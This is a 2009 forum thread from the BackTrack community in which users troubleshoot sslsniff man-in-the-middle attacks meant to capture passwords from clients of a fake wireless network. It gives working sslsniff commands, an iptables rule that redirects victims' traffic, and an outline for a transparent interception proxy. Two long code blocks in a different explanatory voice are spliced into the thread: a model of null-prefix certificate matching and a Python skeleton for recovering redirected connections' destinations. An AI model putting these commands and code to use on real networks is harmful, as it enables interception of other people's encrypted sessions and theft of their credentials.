Remote Exploit Forums

Remote Exploit Forums > BackTrack 4 (pre) Final > BackTrack 4 Package and feature Requests

BackTrack 4 Package and feature Requests: packages to add to the repository.
#11, 11-03-2009, 04:56 PM, Jimmy Kane (Junior Member, Join Date: May 2009, Posts: 11)

OK, awaiting.... Does this work only on IE 6?
#12, 11-03-2009, 07:38 PM, Nick_the_Greek (Senior Member, Join Date: Jul 2009, Location: Greece, Posts: 124)

Quote: Originally Posted by Jimmy Kane
OK awaiting .... does this work only on IE 6?

Unfortunately yes, and only sometimes. Sometimes I get the familiar "assio read error 2" or "got SSL exception". I tried the *\x00 certs with Firefox 3.0.11 with no luck. I don't know yet why this happened, since FF was fixed after 3.0.13.

Security Advisories for Firefox 3.0
MFSA 2009-42: Compromise of SSL-protected communication

I also tried the leaf cert with IE 7, but my wife's habit is to install every security patch for everything. I will set up a VM with XP and an unpatched IE 7 to test with.

If you want, PM me and I will send you instructions on how to install it, since you are obsessed with it. For now I don't want to post any wrong instructions and get people in trouble. I prefer to test first.

Nick.
__________________
The quieter you become....
#13, 11-03-2009, 08:17 PM, Jimmy Kane (Junior Member, Join Date: May 2009, Posts: 11)

I am OK with the install.... But when I have sslsniff running in targeted mode with the wildcard cert, most of the time it won't sniff, and when it does sniff I get the known cert warning; I press accept (testing) and the connection won't continue.
In the sslsniff log I see an SSL error.... I don't know why.... even Moxie Marlinspike doesn't.... Lol
Anyway, if you want targeted mode then you must have one CA cert, e.g. PayPal. I have tried that....
No certificate warning, but no pass/key sniffing, and the connection goes on with SSL.....

I don't know what to do....

PS: if you want to ask Moxie anything, I could mail him (he should respond)....
#14, 11-03-2009, 10:55 PM, Nick_the_Greek (Senior Member, Join Date: Jul 2009, Location: Greece, Posts: 124)

Hi Jimmy,
I believe we are starting to find a solution here. I say "starting" because, after all, we are talking about SSL, and SSL is a tough subject. I am not expecting to compile sslsniff, find a certificate or two and... voila. It requires a lot of reading, experimentation and time.

Anyway, I have never succeeded with targeted mode. I got the same results as you: certificate warning from the client's browser, accept from the client, SSL exception in sslsniff's log.

BTW, what browser are your clients using, and what version?
I am asking because AFAIK wildcard certs are not accepted by IE.

https://www.noisebridge.net/pipermai...er/008400.html

Quote:
It won't work for exploiting the bug for software written with the WIN32 api, they don't accept (for good reason) *
Did you try denying OCSP requests from clients? (the -d option)
The following is how I get to sniff SSL sessions from clients (IE6 only):
Code:
sslsniff -a -d -s 10000 -c /sslsniff-0.6/leafcert.pem -w /sslsniff.log
and a screenshot:
http://uploadingit.com/file/kqjkpo7p...ng_expired.JPG

As you can see, I only get a warning that the cert has expired. The date was not changed.

Quote:
No certificate warning but no pass/key sniffing and the connection goes on with sll.....
What do you mean by that? That your sslsniff session is bypassed and your clients get a "real" SSL connection? (It has happened to me many times.)

Also, when I tried to do client fingerprinting (using airbase for the fake WLAN, with sslsniff running on 192.168.2.129:10000)
Code:
iptables -t nat -A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.2.129:10000
I got a connection time-out. The same result came up when I did the browser-specific attack:

Code:
sslsniff -a -d -s 10000 -f ie -h 80 -c /sslsniff-0.6/leafcert.pem -w /sslsniff.log
Quote:
Ps if you want anything to ask Moxie i could mail him ( he should respond)....
Maybe I will. Thank you for offering. At least he understands what I am asking for. I will do some testing, but no sooner than this weekend. It's a busy week for me.

Keep in touch Jimmy.

Nick.

PS: Try an authority-mode attack in IE6 with the expired leafcert.pem. At least you should see this goddamn thing work.
__________________
The quieter you become....

Last edited by Nick_the_Greek; 11-03-2009 at 11:04 PM.
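Nick's `*\x00` certificates (post #12) and the Noisebridge remark that Win32 clients refuse a bare `*` (post #14) both come down to one thing: how the client compares the name in the certificate against the hostname it dialled. The block below is an added example for this thread, not code from sslsniff, from Moxie Marlinspike or from any browser. `matches_legacy` is a simplified model of the 2009-era behaviour that the null-prefix research and MFSA 2009-42 describe (the name is handled as a NUL-terminated C string, and a lone `*` label is accepted), while `matches_strict` is the length-aware, label-by-label comparison a fixed client performs. Function names, the sample names and the exact wildcard rules are my own choices.

```python
"""Added example for this thread: hostname matching the way a NUL-unaware
client did it in 2009 versus a length-aware matcher.  Not sslsniff code.

Certificate names are bytes exactly as they appear in the CN/SAN octets,
so an embedded NUL can be represented.  Host names are bytes too.
"""


def as_c_string(name: bytes) -> bytes:
    """What strcmp()/strcasecmp() see: everything up to the first NUL."""
    i = name.find(b"\x00")
    return name if i < 0 else name[:i]


def matches_legacy(cert_name: bytes, host: bytes) -> bool:
    """Simplified model of the broken behaviour (an assumption, not any one
    browser's code): the certificate name is treated as a C string, and a
    bare '*' label matches any host.  A CA that validates only the part
    after the NUL sees 'thoughtcrime.org'; this client sees 'www.paypal.com'."""
    name = as_c_string(cert_name).lower()
    host = host.lower()
    if name == b"*":
        return True
    if name.startswith(b"*."):
        return host.endswith(name[1:])  # suffix test only, any label depth
    return name == host


def matches_strict(cert_name: bytes, host: bytes) -> bool:
    """Length-aware matcher: the full octet string is compared, an embedded
    NUL is a hard failure, '*' is accepted only as the whole left-most label
    of a name with at least two fixed labels, and it covers exactly one host
    label (so *.paypal.com does not match a.b.paypal.com).  Refusing a bare
    '*' is the same rule the Win32 API applies."""
    if b"\x00" in cert_name:
        return False
    name_labels = cert_name.lower().split(b".")
    host_labels = host.lower().split(b".")
    if b"" in name_labels or b"" in host_labels:
        return False
    if name_labels[0] == b"*":
        if len(name_labels) < 3 or len(host_labels) != len(name_labels):
            return False
        return name_labels[1:] == host_labels[1:]
    if b"*" in cert_name:
        return False
    return name_labels == host_labels


# Constructed sample names (not real certificates).
NULL_PREFIX = b"www.paypal.com\x00.thoughtcrime.org"
WILDCARD_NULL = b"*\x00.thoughtcrime.org"


def demo() -> dict:
    """Outcome of each sample pair as (legacy, strict)."""
    cases = {
        "null prefix vs www.paypal.com": (NULL_PREFIX, b"www.paypal.com"),
        "*\\x00 cert vs mail.example.net": (WILDCARD_NULL, b"mail.example.net"),
        "bare * vs www.paypal.com": (b"*", b"www.paypal.com"),
        "*.paypal.com vs www.paypal.com": (b"*.paypal.com", b"www.paypal.com"),
        "*.paypal.com vs a.b.paypal.com": (b"*.paypal.com", b"a.b.paypal.com"),
    }
    return {k: (matches_legacy(c, h), matches_strict(c, h))
            for k, (c, h) in cases.items()}


if __name__ == "__main__":
    for label, (legacy, strict) in demo().items():
        print(f"{label:34} legacy={legacy!s:5} strict={strict}")
```

Run it and the first three rows show why the expired leafcert.pem and the `*\x00` certs only ever worked on some clients: a matcher that stops at the NUL, or that honours a lone `*`, accepts them for any site, and a matcher that compares the whole octet string rejects them regardless of who signed them.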
#15, 11-07-2009, 01:37 PM, New Member (Join Date: Nov 2009, Posts: 1)

Hi Guys,

Just wondering how you are getting on with SSLSniff. I played around with it yesterday on 8.10 and had a little success; however, I'm at a loss with the whole wildcard cert, both the one that comes with SSLSniff and the one posted over at Noisebridge too.

If I can help in any way, let me know.

Finux

Just to let you guys know, I tested Firefox version 3.0 and it picked up the cert straight away, saying it was revoked. I was running with the -d option and downloaded Firefox from oldapps.com/firefox.php?

However, 2.0.0.20 was no problem.

I used pretty much the standard stuff I found in the SSLSniff package, and I think the PayPal cert I pulled off here

Last edited by lupin; 11-08-2009 at 12:14 AM. Reason: Merged posts
#16, 11-12-2009, 10:06 PM, Jimmy Kane (Junior Member, Join Date: May 2009, Posts: 11)
Subject: y?

Any progress made, Nick?
For me none. I had no luck at all, and from now on it is a waste of time....
I prefer ettercap filters.... ;-)

Last edited by Jimmy Kane; 11-12-2009 at 10:09 PM.
#17, 11-13-2009, 06:48 AM, Nick_the_Greek (Senior Member, Join Date: Jul 2009, Location: Greece, Posts: 124)

Quote: Originally Posted by Jimmy Kane
Any progress made Nick?
For me none. I had no luck at all and from now on it is a waste of time....
I prefer ettercap filters.... ;-)

From time to time I read about certificates, what SSL is, etc. I am not the kind of person who gives up so easily. I am trying different things, but in the end I have made no significant progress. If I make some, I will let you know.

Nick.

Quote: Originally Posted by finux
....i played around with it yesterday on 8.10....

It would be nicer if you were running BT.
__________________
The quieter you become....

Last edited by Nick_the_Greek; 11-13-2009 at 06:51 AM.
#18, 11-13-2009, 02:04 PM, Jimmy Kane (Junior Member, Join Date: May 2009, Posts: 11)
Subject: yes

I have also been playing with TLS connections for a long time now. One of my favourites is sslstrip, but it is only for the HTTP protocols.... That is its weak point....
Anyway, I am now studying more about TLS and SSL, and maybe it will help...
Recently I read an exploit on Packet Storm about renegotiating TLS; it was a pretty good one.... I recommend it to many people (who do a little reading before practising attacks).
I will keep you informed of any progress I make.... And Nick, please keep us informed too......
In most of the forums I read there are few people who like to "tamper" with SSL...

Be good, dudes
__________________
"Everything that is communication comes from ... quartz crystals..."
#19, 11-13-2009, 02:28 PM, Nick_the_Greek (Senior Member, Join Date: Jul 2009, Location: Greece, Posts: 124)

Quote: Originally Posted by Jimmy Kane
.... And Nick please keep us informed too......

Don't worry, Jimmy.

When you have your own kids (if you don't already), the word "own" will disappear at that moment. "Own" will be replaced with "take" and "share".

What I am trying to say (maybe unsuccessfully) is that I am a sharing guy.

If I got something important or new I will let you know.

Nick
__________________
The quieter you become....
#20, 11-14-2009, 02:25 AM, Gitsnik (Senior Member, Join Date: Jun 2009, Location: The Crystal Wind, Posts: 494)

Quote: Originally Posted by Nick_the_Greek
When you get (if not) your own kids, the word "own" will disappear at the moment. The "own" will be replaced with "take" and "share".

Kids? What about "wife"?!

I swear I've written something similar to this before somewhere, but I can't find it. Anyway, an idea to prod some people along with: when you use iptables to redirect to a socket, that socket (that program) can do a lookup and ask where you were actually going. So if I redirect to 192.168.1.3:8888 and have my program do a lookup, it can see that the connection was actually going to 92.23.220.121*. If that destination is found to have an SSL certificate on it, there is no reason one couldn't write a quick bit of code to generate a fresh certificate, sign it with a valid domain root cert, and pass it along.

Getting the valid domain root cert is difficult, as is making all this happen fast enough for the user, but there it is: SSL sniffing by breaking the single chain into two, the same way sslsniff does it I imagine, but working on anything you care to build it for.

There are limitations; I leave them up to the reader to discover and discuss.
__________________
Never underestimate the power of human stupidity - it is like a force of nature, capable of destroying even the most well laid plans.
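The "lookup" Gitsnik describes is, on Linux, the `SO_ORIGINAL_DST` socket option: after a REDIRECT or DNAT rule like the one Nick posted, connection tracking still remembers the address the client dialled, and the program that accepted the redirected connection can ask the kernel for it. The block below is an added example, not code from sslsniff or from the poster. `parse_sockaddr_in` decodes the 16-byte `struct sockaddr_in` the option returns, `original_destination` wraps the `getsockopt` call, and `should_intercept` applies the two checks a transparent proxy needs before it starts minting certificates. The constants are the Linux values from `<linux/netfilter_ipv4.h>`; `build_sockaddr_in` exists only to construct a sample buffer offline; the listener address 192.168.2.129:10000 is Nick's from the thread; and the certificate generation step is left out, as in the post.

```python
"""Added example: recover the real destination of a connection that iptables
redirected to us (Linux SO_ORIGINAL_DST).  Not sslsniff or the poster's code."""
import socket
import struct
from typing import Tuple

SOL_IP = 0              # Linux value; socket.SOL_IP is not defined on every platform
SO_ORIGINAL_DST = 80    # from <linux/netfilter_ipv4.h>
SOCKADDR_IN_LEN = 16


def build_sockaddr_in(ip: str, port: int) -> bytes:
    """Construct the buffer the kernel would return (only used here to make
    an offline sample; sa_family is native-endian, sin_port network-endian)."""
    return (struct.pack("=H", socket.AF_INET) + struct.pack("!H", port)
            + socket.inet_aton(ip) + b"\x00" * 8)


def parse_sockaddr_in(buf: bytes) -> Tuple[str, int]:
    """Decode struct sockaddr_in: family, port, IPv4 address, 8 bytes padding."""
    if len(buf) < 8:
        raise ValueError("short sockaddr_in")
    (family,) = struct.unpack_from("=H", buf, 0)
    if family != socket.AF_INET:
        raise ValueError(f"unexpected address family {family}")
    (port,) = struct.unpack_from("!H", buf, 2)
    return socket.inet_ntoa(buf[4:8]), port


def original_destination(conn: socket.socket) -> Tuple[str, int]:
    """Where was the client really going?  Meaningful for a connection that
    arrived through a REDIRECT/DNAT rule; for a connection that was not
    NATed, conntrack's original tuple is simply the listener's own address,
    and the call fails with ENOENT if conntrack has no entry at all."""
    raw = conn.getsockopt(SOL_IP, SO_ORIGINAL_DST, SOCKADDR_IN_LEN)
    return parse_sockaddr_in(raw)


def should_intercept(dst: Tuple[str, int], listener_ip: str,
                     tls_ports: Tuple[int, ...] = (443,)) -> bool:
    """Two checks before impersonating a server: the original port must be
    one we speak TLS on, and the original address must not be the proxy
    itself (a rule that also catches the proxy's own outbound connections
    would otherwise loop the proxy onto itself)."""
    ip, port = dst
    return port in tls_ports and ip != listener_ip


def serve(listen_ip: str = "192.168.2.129", listen_port: int = 10000) -> None:
    """Accept redirected connections and log their original destination.
    Hypothetical proxy skeleton: the TLS handshake and the on-the-fly
    certificate minting that sslsniff performs are deliberately omitted."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_ip, listen_port))
    srv.listen(16)
    while True:
        conn, peer = srv.accept()
        with conn:
            dst = original_destination(conn)
            action = "intercept" if should_intercept(dst, listen_ip) else "pass"
            print(f"{peer[0]}:{peer[1]} -> {dst[0]}:{dst[1]} [{action}]")


if __name__ == "__main__":
    serve()
```

Pointed at the same DNAT rule Nick used, `serve()` is also a quick way to confirm that redirected clients really reach the listener and what they were dialling, before bringing sslsniff into the picture. The timing problem Gitsnik mentions is real: the proxy has to fetch the real server's certificate and sign a copy before the client's handshake times out, which is why sslsniff caches the certificates it mints.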